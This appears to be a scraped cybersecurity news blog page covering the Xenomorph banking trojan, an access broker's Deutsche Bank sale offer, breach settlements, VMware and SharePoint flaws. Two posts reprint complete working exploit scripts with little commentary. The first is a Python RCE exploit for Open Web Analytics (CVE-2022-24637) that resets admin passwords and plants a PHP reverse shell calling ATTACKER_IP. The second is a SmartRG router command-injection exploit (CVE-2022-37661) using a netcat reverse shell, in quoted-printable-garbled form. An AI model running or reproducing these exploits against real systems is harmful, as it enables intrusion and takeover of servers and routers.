Debian: DSA-5278-1: xorg-server Buffer OverflowSecurity Update

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Malware Spotted on the Google Play Store Steals Banking Credentials & Intercepts SMS Messages

By

-

13 November 2022

The Zscaler ThreatLabz team found the ‘Xenomorph’ banking trojan embedded in a Lifestyle app in the Google Play store. The app’s name is “Todo: Day manager,” and has more than 1,000 downloads.

The trojan called ‘Xenomorph’ steals login information from users’ devices’ banking applications. Additionally, it has the ability to intercept users’ SMS messages and notifications, enabling it access to one-time passwords and requests for multifactor authentication.

“Our analysis found that the Xenomorph banking malware is dropped from GitHub as a fake Google Service application upon installation of the app”, the Zscaler ThreatLabz team

“It starts with asking users to enable access permission. Once provided, it adds itself as a device admin and prevents users from disabling Device Admin, making it uninstallable from the phone”.

Xenomorph Infection Cycle

The application obtains the banking malware payload URL when it is first launched by connecting to a Firebase server.

The malicious Xenomorph banking malware samples are then downloaded from Github. Later, to seek more commands and spread the infection, this financial malware contacts the command-and-control (C2) servers using Telegram page content or a static code routine.

Researchers say the malware will only download further banking payloads if the “Enabled” parameter is set to true. Also, the banking payload has the Telegram page link encoded with RC4 encryption.

Upon execution, the banking payload will reach out to the Telegram page and download the content hosted on that page.

It’s been noticed that C2 domains are encoded in RC4 and stored within the code. The payload notifies C2 about every loaded application so that it can get further instructions.

In one instance, if a legitimate application is installed in the infected device, it will display the fake login page of a targeted banking application.

Malware uploading all package information to receive commands

Another programme called “Expense Keeper” was also seen by ThreatLabz to be acting in a similar manner. When this application is executed, it is seen that the “Enabled parameter” is set to false.

The Dropper URL for the banking payload could not be retrieved. For the same, ThreatLabz collaborates with the Google Security team.

Final Word

These bank phishing installers frequently rely on deceiving users into installing harmful programmes.

Users are urged to pay attention to the applications that are installed. A Play Store app shouldn’t urge users to install it from untrusted sources or side-load it. Finally, user awareness is crucial to thwarting various phishing tactics.

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

BREAKING: Access broker claims to have hacked Deutsche Bank, Offers access to its systems for sale on Telegram

By

-

11 November 2022

A bad actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online.

The security researcher Dominic Alvieri was one of the first experts to report the announcement published by the initial access broker on Telegram.

The IAB claims to have access to around 21000 machines in the bank’s network, most of which are Windows systems. It also claims that the compromised machines were protected with a Symantec EDR solution.

“FTP , Shells , root , SQL-inj, DB, Servers.. We selling another network accss of a particular Bank, internal network ,we have DA, domain has around 21k machines configured most being windows Edr of machines are Symantec . Also internal network filters TCP,UDP,HTTP & HTTPS . Employees communicate between office chats services, there is file servers with more that 16TB of internal Data including share folder for every usr on the network & They also have flexcube DB.. We can provide VDI & VPN + all passwords of domain dump (with DA usr’s) Their funds is in B$ Price 7.5BTC We will request for proof that one can afford to avoid time wasters etc…” reads the announcement.

Breaking

Deutsche Bank allegedly breached and for sale by the same access broker that sold access to Medibank.

HQ in Frankfurt, Germany shown.

/db.com @DeutscheBank

c/o @osint_ben @Europol @DTCERT #cybersecurity #infosec @campuscodi @LawrenceAbrams pic.twitter.com/qFhwQ5zSIY
— Dominic Alvieri (@AlvieriD) November 11, 2022

The seller said to have had access to the chat services used for internal communications, he also claimed to have access to file servers containing 16 terabytes of data.

The IAB is offering access to the Deutsche Bank 7.5 Bitcoin, worth approximately $156,274.

The seller added that he is receiving a lot of requests for this offer:

“We are getting a lot of requests and it’s hard to filter out fake buyers so we ask for proof you can afford it or (share with us your @ on forums (we recommend we’ll known individuals for us to work easily)” added the seller.

Alvieri speculates that the IAB is the same broker who recently offered for sale access to the systems of the Australian health insurance Medibank.

Medibank is an Australian healthcare company based in Melbourne. The company provides private health insurance and health insurance solutions. Last month, there was a ransomware attack on the insurer. The ransomware attack of the Australian healthcare company Medibank has caused a real earthquake in Australia and the government is planning to tighten the legislation in terms of privacy and security requirements. In this security incident, the attackers were able to capture 9.7 million customer records of the health insurer.

The notice from the provider can be found here and states that criminals posted files containing Medibank customer data on a dark web forum. This data includes personal information such as names, addresses, dates of birth, phone numbers, email addresses, Medicare numbers for customers, in some cases passport numbers for our international students, and some health benefits data.

Currently, the hack of the Australian healthcare company Medibank is shaking Down-Under. This is because the attacker is offering millions of patient data on the darknet. Shortly before that, the Australian telecom provider Optus was hacked and millions of customer data were siphoned off. And very recently, the same cybercriminals who attacked Medibank are offering Deutsche Bank data on the darknet. According to reports, the names of the hackers, who operate out of Russia, are known.

Deutsche Bank data on the darknet

If the report is true, there has also been a successful attack on Deutsche Bank, because according to the following tweet, the same group responsible for the Medibank hack could be the attacker that is offering access data to Deutsche Bank’s systems on the darknet. But that’s not confirmed – Lawrence Abrams from Bleeping Computer told me, that it’s an alleged initial access broker, not the same hackers who stole the data from MediBank. But it could be the same actor, that has sold the ransomware gang the access to the network (it’s also unconfirmed and can be a scam).

We’ve launched a Facebook Page, and a group to help people stay informed of the latest security threats, trends and developments. We’d love it if you could Follow us and/or help with raising awareness in the group!

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Open Web Analytics RCE 1.7.3 – Remote Code Execution

By

-

11 November 2022

A Vulnerability was discovered in Open Web Analytics, by Security Researcher Yerodin Richards,the vulnerability, an RCE (Remote code execution) affects versions <1.7.4.

# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux 
# CVE : CVE-2022-24637

import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored

def print_message(message, type):
   if type == 'SUCCESS':
      print('[' + colored('SUCCESS', 'green') +  '] ' + message)
   elif type == 'INFO':
      print('[' + colored('INFO', 'blue') +  '] ' + message)
   elif type == 'WARNING':
      print('[' + colored('WARNING', 'yellow') +  '] ' + message)
   elif type == 'ALERT':
      print('[' + colored('ALERT', 'yellow') +  '] ' + message)
   elif type == 'ERROR':
      print('[' + colored('ERROR', 'red') +  '] ' + message)

def get_normalized_url(url):
   if url[-1] != '/':
      url += '/'
   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
      url = "http://" + url
   return url

def get_proxy_protocol(url):
   if url[0:8].lower() == 'https://':
      return 'https'
   return 'http'

def get_random_string(length):
   chars = string.ascii_letters + string.digits
   return ''.join(random.choice(chars) for i in range(length))

def get_cache_content(cache_raw):
   regex_cache_base64 = r'\*(\w*)\*'
   regex_result = re.search(regex_cache_base64, cache_raw)
   if not regex_result:
      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
      exit()
   else:
      cache_base64 = regex_result.group(1)
   return base64.b64decode(cache_base64).decode("ascii")

def get_cache_username(cache):
   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
   return re.search(regex_cache_username, cache).group(1)

def get_cache_temppass(cache):
   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
   return re.search(regex_cache_temppass, cache).group(1)

def get_update_nonce(url):
   try:
      update_nonce_request = session.get(url, proxies=proxies)
      regex_update_nonce = r'owa_nonce" value="(\w*)"'
      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
   except Exception as e:
      print_message('An error occurred when attempting to update config!', "ERROR")
      print(e)
      exit()
   else:
      return update_nonce

parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str, 
                  help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str, 
                  help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str, 
                  help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str,
                  help='The username to exploit (Default: admin)')
parser.add_argument('-p','--password', default=get_random_string(32), type=str,
                  help='The new password for the exploited user')
parser.add_argument('-P','--proxy', type=str,
                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true',
                  help='Check vulnerability without exploitation')

args = parser.parse_args()

base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"

username = args.username
new_password = args.password

reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename

if args.proxy:
   proxy_url = get_normalized_url(args.proxy)
   proxy_protocol = get_proxy_protocol(proxy_url)
   proxies = { proxy_protocol: proxy_url }
else:
   proxies = {}

session = requests.Session()

try:
   mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
   print_message('Could not connect to "' + base_url, "ERROR")
   exit()
else:
   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")

if 'Open Web Analytics' not in mainpage_request.text:
   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
   print_message('The webserver indicates a vulnerable version!', "ALERT")

try:
   data = {
      "owa_user_id": username, 
      "owa_password": username, 
      "owa_action": "base.login"
   }
   session.post(login_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred during the login attempt!', "ERROR")
   print(e)
   exit()
else:
   print_message('Attempting to generate cache for "' + username + '" user', "INFO")

print_message('Attempting to find cache of "' + username + '" user', "INFO")

found = False

for key in range(100):
   user_id = 'user_id' + str(key)
   userid_hash = hashlib.md5(user_id.encode()).hexdigest() 
   filename = userid_hash + '.php'
   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
   cache_request = requests.get(cache_url, proxies=proxies)
   if cache_request.status_code != 200:
      continue;
   cache_raw = cache_request.text
   cache = get_cache_content(cache_raw)
   cache_username = get_cache_username(cache)
   if cache_username != username:
      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
      continue;
   else:
      found = True
      break
if not found:
   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
   exit()

cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")

if args.check:
   print_message('The system appears to be vulnerable!', "ALERT")
   exit()

try:
   data = {
      "owa_password": new_password, 
      "owa_password2": new_password, 
      "owa_k": cache_temppass, 
      "owa_action": 
      "base.usersChangePassword"
   }
   session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when changing the user password!', "ERROR")
   print(e)
   exit()
else:
   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")

try:
   data = {
      "owa_user_id": username, 
      "owa_password": new_password, 
      "owa_action": "base.login"
   }
   session.post(login_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred during the login attempt!', "ERROR")
   print(e)
   exit()
else:
   print_message('Logged in as "' + username + '" user', "SUCCESS")

nonce = get_update_nonce(update_config_url)

try:
   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
   data = {
      "owa_nonce": nonce, 
      "owa_action": "base.optionsUpdate", 
      "owa_config[base.error_log_file]": log_location, 
      "owa_config[base.error_log_level]": 2
   }
   session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when attempting to update config!', "ERROR")
   print(e)
   exit()
else:
   print_message('Creating log file', "INFO")

nonce = get_update_nonce(update_config_url)

try:
   data = {
      "owa_nonce": nonce, 
      "owa_action": "base.optionsUpdate", 
      "owa_config[shell]": reverse_shell 
   }
   session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when attempting to update config!', "ERROR")
   print(e)
   exit()
else:
   print_message('Wrote payload to log file', "INFO")

try:
   session.get(shell_url, proxies=proxies)
except Exception as e:
   print(e)
else:
   print_message('Triggering payload! Check your listener!', "SUCCESS")
   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

SmartRG Remote Code Execution: SR510n 2.6.13

By

-

11 November 2022

A Vulnerability was discovered in SmartRG Router, by Security Researcher Yerodin Richards,the vulnerability, an RCE (Remote code execution) affects versions 2.5.15 / 2.6.13.

# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

import requests
from subprocess import Popen, PIPE

router_host =3D "http://192.168.1.1"
authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"

lhost =3D "lo"
lport =3D 80

payload_port =3D 81


def main():
    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=
p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")


def get_session():
    url =3D router_host + "/admin/ping.html"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    r =3D requests.get(url, headers=3Dheaders).text
    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
    s =3D ""
    while r[i] !=3D "'":
        s =3D s + r[i]
        i =3D i + 1
    return s


def send_payload(payload):
    print(payload)
    url =3D router_host + "/admin/pingHost.cmd"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=
: get_session()}
    requests.get(url, headers=3Dheaders, params=3Dparams).text


main()

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Cyber Today: Crypto Winter comes for FTX, oil and gas flow control vulnerability, images hide malware in PyPI

By

RiSec.Mitch

-

10 November 2022

Table of Contents

Crypto Winter comes for FTX

Earlier this week, crypto exchange Binance signed a letter of intent to acquire its rival FTX. This comes after FTX experienced a liquidity crunch and reached out to Binance for assistance. The letter did not bind Binance to complete the acquisition. However, less than a day after signing the deal, Coindesk’s sources say Binance appears highly unlikely to go forward with the acquisition. FTX’s loan commitments reportedly raise concerns about proceding with the acquisition. Over the last three days, FTX saw over $6 billion in withdrawals. Additionally Bloomberg’s source say the U.S. Securities and Exchange Commission and Commodity Futures Trading Commission began investigating FTX’s relationship with its sister entity Alameda Research about potentially mishandling of customer funds.

(TechCrunch)

Vulnerability found in oil and gas utilities

Researchers at the security company Claroty discovered a vulnerability in a widely deployed flow computer system used across oil and gas utilities. These computers calculate oil and gas volume and flow rates, essential for operations but also for billing. The “high-severity path-traversal vulnerability” would allow an attacker to take over a flow computer and remotely disrupt its ability for accurate measurements, letting an attacker obtain root access. The maker of the system, ABB said it issued an advisory on the vulnerability to customers on July 14th, and issued an update to resolve the issue. The company also advised that “proper network segmentation” can also adequately mitigate the vulnerability.

(The Record)

PyPI packages hiding malware in image files

Another day, another piece of malware hiding in the Python Package Index. Researchers at Check Point Research sent out an advisory warning about a malicious packages named “apicolor.” This contained an odd non-trivial code section at the beginning of its installation script. This downloaded a picture from the web. The installed package would then process the image and trigger the processing generated output using the exec command. Check Point notes that it regularly scans PyPI for malicious packages, but said this stood out a “unique and distinct” approach. While many malicious packages in PyPI come as a result of copy and paste techniques, this approach shows that obfuscation methods on the index evolve rapidly.

(InfoSecurity Magazine)

Experian and T-Mobile settle on breaches

The two separately reached agreements with 40 US states to resolve data lost in breaches from 2012 and 2015. Experian will pay the bulk of the settlement at $14 million, with $2 million paid by the wireless carrier. The 2012 breach at Experian involved an inside actor brought into the company through an acquisition. The employee sold data on over 3 million queries to third-parties. The company did not alert regulators or impacted customers. The 2015 breach impacted Experian’s network, where T-Mobile stored customer credit applications, impacting 15 million people. Experian offered two years of free credit monitoring after that breach. The settlement will see them providing an additional five years, as well as free regular credit reports.

(The Register)

Thanks to today’s episode sponsor, AppOmni

Twitter rolls out Blue verification

Twitter rolled out its expected update to its Blue subscription service for iOS, which now authenticates users as part of the $7.99 subscription. It’s unclear when it will arrive on Android, the web app, or in new markets. The company also tested out showing a gray check mark on select accounts labeling them as “Official,” although owner Elon Musk summarily announced that he “killed it.” Right now Blue only offers early access to new features, with Twitter promising longer video uploads, priority surfacing in search, and fewer ads as “coming soon.”

(The Verge)

IPFS used for malware hosting

The distributed InterPlanetary File System or IPFS represents a building block of web3. It also turns out it’s a great way to host malware. That comes from researchers at Cisco Talos, which found it being used by multiple malware families to retrieve initial malware stages. IPFS allows an attacker to efficiently make local content available on multiple nodes automatically without cost. Because the hash tables for the files are maintained across IPFS gateways, it’s resilient to takedowns without invoking a storage cost. The vectors of malware remain the same, attackers must still direct victims to an IPFS file. Cisco recommends organizations not involved in web3 simply block access to all IPFS gateways.

(Security Week)

Lenovo fixes UEFI Secure Boot

Security researchers at ESET discovered that Lenovo mistakenly included an early development driver that would allow a user to change secure boot settings for the OS in its final production versions. This impacted 54 laptops across Lenovo’s ThinkBook, IdeaPad, and Yoga lines, letting an attacker deactivate UEFI Secure Boot. This system is meant to ensure malicious code can’t load and execute during the boot process. Without it, someone with access to a machine could bypass OS-level security protections and install malware that persists after an OS wipe. Lenovo released a BIOS fix to resolve the issue on all machines, except for one Ideapad model that reached end of life.

(Bleeping Computer)

IBM plans to scale up quantum computers

IBM launched its new Osprey quantum processor, offering 433 qubits, 240% more than its last-gen Eagle processor from 2021. Big Blue’s current quantum roadmap ultimately plans to release a 4,000-qubit Kookaburra processor in 2025, preceded by a 1,121-qubit Condor processor next year and the 1,386-qubit Flamingo in 2024. The company also updated its Qiskit Runtime to make programming these larger chips a little easier, letting developers trade speed for a reduced error count, something that can be an issue in quantum systems. IBM also provided more details on its upcoming Quantum System Two, with a planned 2023 launch. THis will integrate multiple quantum processors into a single system with high-speed links.

(TechCrunch)

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Experian, T-Mobile US settle data spills for mere $16M

By

RiSec.Mitch

-

10 November 2022

Experian and T-Mobile US have reached separate settlements with 40 states in America following a pair of data security breaches in 2012 and 2015. The settlement will net authorities $16 million, along with assurances it won’t happen again.

Experian will be bearing the largest brunt of the fine, with $14 million coming from the credit reporting company.

Led by attorneys general from Massachusetts and Illinois, the settlements stem from a pair of data breaches at Experian in 2012 and 2015, the latter of which T-Mo was caught up in.

The 2012 breach at Experian were revealed following a notification to the US Secret Service. Experian bought a company called Court Ventures, Inc., and all of its customers, one of whom was an identity thief. That crook has since plead guilty to wire fraud, identity fraud and other crimes, including falsely representing himself as a private investigator to gain access to Experian systems.

All the data collected by that single intruder was handed to other nefarious parties, who made over 3 million queries for personal information against data owned by CVI and Experian.

Experian gave no notice to affected consumers or state authorities regarding the incident.

In 2015, the consumer credit reporting company was hit again. This time the attacker managed to gain access to a portion of Experian’s network where T-Mobile US stored data used to process customer applications. As a result of that attack, the data of 15 million people – including Social Security numbers, other ID numbers, name, address and birthdate – was stolen.

T-Mo and Experian notified customers of that attack, and Experian offered free credit reporting services, as is usually the case when a large company has that volume of personally identifiable information stolen.

Wrist, meet slap

Along with startlingly small financial penalties, Experian is being forced to provide an additional five free years of credit monitoring on top of two years it previously awarded in wake of the 2015 breach, as well as two free credit reports annually.

In addition, the credit bureau’s settlement included requirements that it maintain an incident response and data breach notification plan, develop an identity theft prevention program, and do proper due diligence in vetting people with access to data, including reassessing access after an acquisition.

Experian was also told not to “misrepresent to its clients the extent to which [it] protects the privacy and security of personal information.”

T-Mobile US, meanwhile, was told to improve its vendor management oversight and develop a compliance program that ensures third parties with access to customer PII are storing it properly.

Whether either company has learned from those breaches is unclear, especially in light of subsequent incidents at both companies.

In 2020, Experian reported it had handed data including PII for 24 million South Africans to another individual who falsely representing themselves in order to gain access. Despite assurances that the data had been recovered and destroyed, it later showed up online.

Last year, T-Mobile US was attacked again and 77 million customer records were stolen. T-Mobile paid out $550 million to settle that case. Startlingly, it’s T-Mo’s fifth acknowledged breach in four years.

To put its latest $2.43 million fine in perspective, the Un-Carrier reported a net income of $508 million in Q3 of this year. Experian, facing $13.67 million in fines, made around $6.2 billion in FY 22 [PDF].

“I am pleased to join my colleagues today in holding these companies accountable for their failures to protect the sensitive information of our residents,” said Massachusetts AG Maura Healey.

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

VMware fixes three critical flaws in Workspace ONE Assist

By

-

9 November 2022

VMware has released security updates to address three critical vulnerabilities impacting the Workspace ONE Assist product. Remote attackers can exploit the vulnerabilities to bypass authentication and elevate privileges to admin.

Workspace ONE Assist allows IT staff to remotely access and troubleshoot devices in real-time from the Workspace ONE console.

The first issue, tracked as CVE-2022-31685 (CVSSv3 9.8/10), is an authentication bypass flaw, an attacker with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application.

The second issue, tracked as CVE-2022-31686 (CVSSv3 9.8/10), is a broken authentication method, an attacker with network access may be able to obtain administrative access without the need to authenticate to the application.

The third critical issue fixed by the virtualization giant is a broken authentication control tracked as CVE-2022-31687.

An attacker with network access may be able to obtain administrative access without the need to authenticate to the application.

The company addressed them with the release of Workspace ONE Assist 22.10 (89993) for Windows customers.

VMware also addressed two other issues, a reflected cross-site scripting (XSS) vulnerability tracked as CVE-2022-31688 (CVSSv3 score 6.4) and a session fixation vulnerability tracked as CVE-2022-31689 (CVSSv3 score 4.2).

The five issues were reported to VMware by Jasper Westerman, Jan van der Put, Yanick de Pater, and Harm Blankers of REQON IT-Security.

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Hackers are using a years-old Microsoft vulnerability to attack governments around the world

By

-

9 November 2022

Rewind back to July 2019, hackers gained access to dozens of computer servers in Vienna and Geneva belonging to the United Nations. In one of the largest-ever breaches of U.N. information, the hackers had what was estimated as tens of thousands of staff records, contracts, databases, and passwords at their fingertips. After technicians discovered the attack, they had to work through at least two weekends to isolate more than 40 compromised computers. Twenty computers had to be completely rebuilt.

The hackers accessed the U.N.’s servers by exploiting a vulnerability in Microsoft SharePoint, a collaborative file-sharing software that acts as an internal network for hundreds of thousands of clients, many of them multinational corporations, banks, insurance companies, and government agencies. Microsoft had issued a fix for the SharePoint vulnerability earlier in 2019, but it’s unlikely those updates had been installed on the U.N.’s servers.

Rest of World spoke to four experts who said that hundreds of thousands of SharePoint users around the world could still be exposed to similar hacks if they’ve failed to install the software updates. Earlier this year, Iranian state-backed actors likely used the same vulnerability to target Albanian government servers over a period of several months. After the hack’s discovery, Albania broke off diplomatic ties with Iran.

Iranian state-backed actors likely used the same vulnerability to target Albanian government servers over a period of several months.

“It’s fascinating that here we are, three and a half years after the patches have been available, and it’s still being used in the wild actively by threat actors,” Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative, told Rest of World about the SharePoint vulnerability. Zero Day Initiative pays researchers to detect weaknesses in widely used software, including CVE-2019-0604, the flaw that hackers have been using for more than three years to gain access to critical systems around the world.

Launched in 2001, Microsoft SharePoint is used by all types of organizations to store and share documents and make them accessible to anyone inside the organization. By 2017, Microsoft reported that more than 250,000 organizations installed SharePoint. Childs says that the number of servers running the software is in the millions.

Childs, who previously worked at Microsoft, said hackers can use CVE-2019-0604 to remotely access any information an organization stores in SharePoint. Because it gives them “pretty much everything,” said Childs, “it’s the type of bug people really like to use when they’re threat actors.” CVE-2019-0604 has become a known access point abused by hacker groups and state-based threat actors to enter internal systems in order to collect sensitive information or plant ransomware.

Microsoft declined to answer specific questions from Rest of World about the number of SharePoint users who remain vulnerable to CVE-2019-0604. A company spokesperson simply replied, “To be fully protected from this vulnerability, Microsoft recommends that customers install all updates listed for their system.”

SharePoint’s widespread use by financial institutions, multinational companies, and government agencies has made it an appealing target for hackers all over the world. In 2019, the Canadian Center for Cyber Security and the Saudi National Cybersecurity Authority both reported attacks like the one against the U.N. The same year, notorious hacking group Emissary Panda, or APT27 — allegedly backed by the Chinese government — attacked SharePoint servers belonging to two governments in the Middle East by exploiting CVE-2019-0604, according to cybersecurity firm Palo Alto Networks. Also in 2019, Iranian state-backed actors used it to attack an unnamed Middle Eastern energy company. In 2020, unknown hackers struck two municipalities in the U.S., and the Australian government disclosed the SharePoint systems were used against multiple targets in the country. The Australian Cyber Security Centre described the attacks as “the most significant, coordinated cybertargeting against Australian institutions the Australian Government has ever observed.” In 2021, hacker gang Hello/WickrMe used it to launch several ransomware attacks.

Claire Tills, a senior research engineer at cybersecurity firm Tenable, told Rest of World, “Attackers favor flaws like this because they exist in products ubiquitous to enterprise environments and give them a foothold from which to launch post-exploitation activities.”

The SharePoint vulnerability has been so popular among hackers that the U.S. government’s Cybersecurity and Infrastructure Security Agency, or CISA, which is part of the Department of Homeland Security, included the SharePoint vulnerability in its list of the Top 10 Most Exploited Vulnerabilities between 2016 and 2019.

All of these attacks took place after Microsoft had already released patches for CVE-2019-0604 earlier in 2019. But in order to protect a system, all three patches — released in February, March, and April of 2019 — need to be installed. Cybersecurity experts speaking to Rest of World said that SharePoint users who installed the first and even the second update remain exposed if they haven’t realized they need to do the third. Ideally, a flaw like this would have been patched in one go, making life easier for users, who could simply apply one fix and move on. Instead, Microsoft fumbled the patching process, requiring three separate updates in as many months. And the patches themselves were flawed — within an hour after Microsoft released the first patch, the same researcher who discovered CVE-2019-0604 had already bypassed the patch. “We’ve got bad patches and unclear communication around them that are causing the industry to be slow adopting what are in a lot of ways really critical updates,” said Childs.

Kevin Beaumont, a cybersecurity expert who used to work at Microsoft, has been following the SharePoint vulnerability since 2019. At the time, Beaumont said this flaw had the potential to have a long-lasting impact. “I think this will be one of the biggest [vulnerabilities] in years. It would own a lot of enterprises. Like, a LOT,” he wrote on Twitter.

Beaumont’s prediction has come to be true. Even if organizations haven’t been hacked, those that have been using SharePoint since 2019 or before could be vulnerable if they haven’t installed all of the updates that have been released since then. For example, in 2020, Dhiraj Mishra, at the time a consultant at cybersecurity firm Cognosec, found that the Income Tax Department in India and the MIT Sloan School of Management were both exposed by the SharePoint vulnerability. After he reported his findings to the Indian Computer Emergency Response Team and MIT, the organizations patched it, Mishra wrote.

“I think this will be one of the biggest [vulnerabilities] in years. It would own a lot of enterprises. Like, a LOT.”

